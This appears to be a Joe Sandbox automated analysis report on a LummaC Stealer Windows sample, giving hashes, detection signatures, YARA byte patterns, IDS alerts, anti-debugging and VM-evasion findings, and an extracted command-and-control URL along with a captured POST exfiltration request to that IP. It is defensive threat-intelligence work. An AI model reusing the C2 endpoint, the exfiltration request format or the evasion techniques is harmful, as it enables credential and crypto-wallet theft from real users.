Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
I5jG2Os8GA.exe

Overview

General Information

Sample name:I5jG2Os8GA.exe
renamed because original name is a hash value
Original sample name:1fbbcb432e80904478cd943fef44a3b5632dfd25d77ad2c4995d8ccc55a3b919.exe
Analysis ID:1555045
MD5:e90e793f59c0a6a60182c3f3a597ff0c
SHA1:6b9f2bf982e071bfd9b4b371e581993ed3ef8a7c
SHA256:1fbbcb432e80904478cd943fef44a3b5632dfd25d77ad2c4995d8ccc55a3b919
Tags:94-158-244-69exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Delayed program exit found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Enables driver privileges
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • I5jG2Os8GA.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\I5jG2Os8GA.exe" MD5: E90E793F59C0A6A60182C3F3A597FF0C)
    • WerFault.exe (PID: 3324 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1720 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LummaCStealer_1Yara detected LummaC StealerJoe Security
    dump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1263036918.0000000004280000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x1450:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.3.I5jG2Os8GA.exe.4280000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              0.3.I5jG2Os8GA.exe.4280000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                0.2.I5jG2Os8GA.exe.400000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                  0.2.I5jG2Os8GA.exe.400000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:54:17.003790+010020229301A Network Trojan was detected20.109.210.53443192.168.2.1049759TCP
                    2024-11-13T10:54:54.605405+010020229301A Network Trojan was detected20.109.210.53443192.168.2.1049975TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:53:29.772818+010020432061A Network Trojan was detected192.168.2.104997994.158.244.6980TCP
                    2024-11-13T10:54:30.179436+010020432061A Network Trojan was detected192.168.2.104979994.158.244.6980TCP
                    2024-11-13T10:54:39.654677+010020432061A Network Trojan was detected192.168.2.104985494.158.244.6980TCP
                    2024-11-13T10:54:48.777818+010020432061A Network Trojan was detected192.168.2.104990594.158.244.6980TCP
                    2024-11-13T10:54:57.784098+010020432061A Network Trojan was detected192.168.2.104995194.158.244.6980TCP
                    2024-11-13T10:55:06.773949+010020432061A Network Trojan was detected192.168.2.104997894.158.244.6980TCP
                    2024-11-13T10:55:24.717528+010020432061A Network Trojan was detected192.168.2.104998094.158.244.6980TCP
                    2024-11-13T10:55:25.421751+010020432061A Network Trojan was detected192.168.2.104998194.158.244.6980TCP
                    2024-11-13T10:55:42.661653+010020432061A Network Trojan was detected192.168.2.104998294.158.244.6980TCP
                    2024-11-13T10:55:51.436285+010020432061A Network Trojan was detected192.168.2.104998394.158.244.6980TCP
                    2024-11-13T10:56:00.595324+010020432061A Network Trojan was detected192.168.2.104998494.158.244.6980TCP
                    2024-11-13T10:56:09.361497+010020432061A Network Trojan was detected192.168.2.104998594.158.244.6980TCP
                    2024-11-13T10:56:18.125634+010020432061A Network Trojan was detected192.168.2.104998694.158.244.6980TCP
                    2024-11-13T10:56:26.916302+010020432061A Network Trojan was detected192.168.2.104998794.158.244.6980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:55:25.421751+010028438641A Network Trojan was detected192.168.2.104998194.158.244.6980TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
                    Source: I5jG2Os8GA.exeReversingLabs: Detection: 89%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: I5jG2Os8GA.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004052D9 CryptUnprotectData,0_2_004052D9

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeUnpacked PE file: 0.2.I5jG2Os8GA.exe.400000.0.unpack
                    Source: I5jG2Os8GA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: Binary string: C:\dat\yijole\segod\dile62\ru.pdb source: I5jG2Os8GA.exe
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00451F08 FindFirstFileExW,0_2_00451F08
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0425216F FindFirstFileExW,0_2_0425216F
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04252223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_04252223

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49854 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49799 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49905 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49978 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49951 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49983 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49986 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49981 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.10:49981 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49982 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49984 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49985 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49980 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49987 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49979 -> 94.158.244.69:80
                    Source: Malware configuration extractorURLs: http://94.158.244.69/c2sock
                    Source: Joe Sandbox ViewIP Address: 94.158.244.69 94.158.244.69
                    Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.10:49759
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.10:49975
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownHTTP traffic detected: POST /c2sock HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: TeslaBrowser/5.5Content-Length: 16798Host: 94.158.244.69
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.000000000566B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/0WJ9
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/9dokr
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/O4ze
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3054795348.00000000027D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/SO
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/Xl2v
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/ZD8C
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/ZKAf
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp, I5jG2Os8GA.exe, 00000000.00000002.3060914805.0000000005504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock5
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockP
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockb
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.0000000005504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2socks
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3054795348.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2socks0
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockv
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/e/IR
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/iU89
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/j3Rh
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/l0FL
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/qSC2
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/rD3S
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/rF5X
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/t8EB
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/xQclE
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/xjsh
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: Amcache.hve.14.drString found in binary or memory: http://upx.sf.net
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

                    System Summary

                    barindex
                    Source: 00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040B81C lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrcmpW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,NtCreateFile,lstrcatW,NtQueryDirectoryFile,lstrcmpW,NtClose,lstrcmpW,lstrlenW,lstrlenW,lstrcmpW,0_2_0040B81C
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00422177 NtQueryInformationProcess,0_2_00422177
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040A928 lstrcmpW,lstrlenW,lstrcatW,NtCreateFile,lstrcatW,lstrlenW,0_2_0040A928
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040B129 lstrcatW,lstrcatW,NtReadFile,NtClose,0_2_0040B129
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0042F1C2 NtClose,0_2_0042F1C2
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004244E4 NtSetInformationThread,0_2_004244E4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004224A3 NtQueryInformationProcess,0_2_004224A3
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004245EC NtQuerySystemInformation,0_2_004245EC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00421EEB NtQueryInformationProcess,0_2_00421EEB
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040B7BB lstrcmpW,NtClose,0_2_0040B7BB
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040B7F5 NtClose,0_2_0040B7F5
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040B81C0_2_0040B81C
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0042C0DA0_2_0042C0DA
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004340800_2_00434080
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040E14E0_2_0040E14E
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040A9280_2_0040A928
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040B1290_2_0040B129
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0042B9C50_2_0042B9C5
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004069A10_2_004069A1
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041F9A40_2_0041F9A4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041C2700_2_0041C270
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0042F2780_2_0042F278
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040620B0_2_0040620B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004302280_2_00430228
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004052D90_2_004052D9
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00436ADC0_2_00436ADC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00405AAA0_2_00405AAA
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043B3620_2_0043B362
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004024760_2_00402476
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0042FD350_2_0042FD35
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0042AD820_2_0042AD82
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0042D6580_2_0042D658
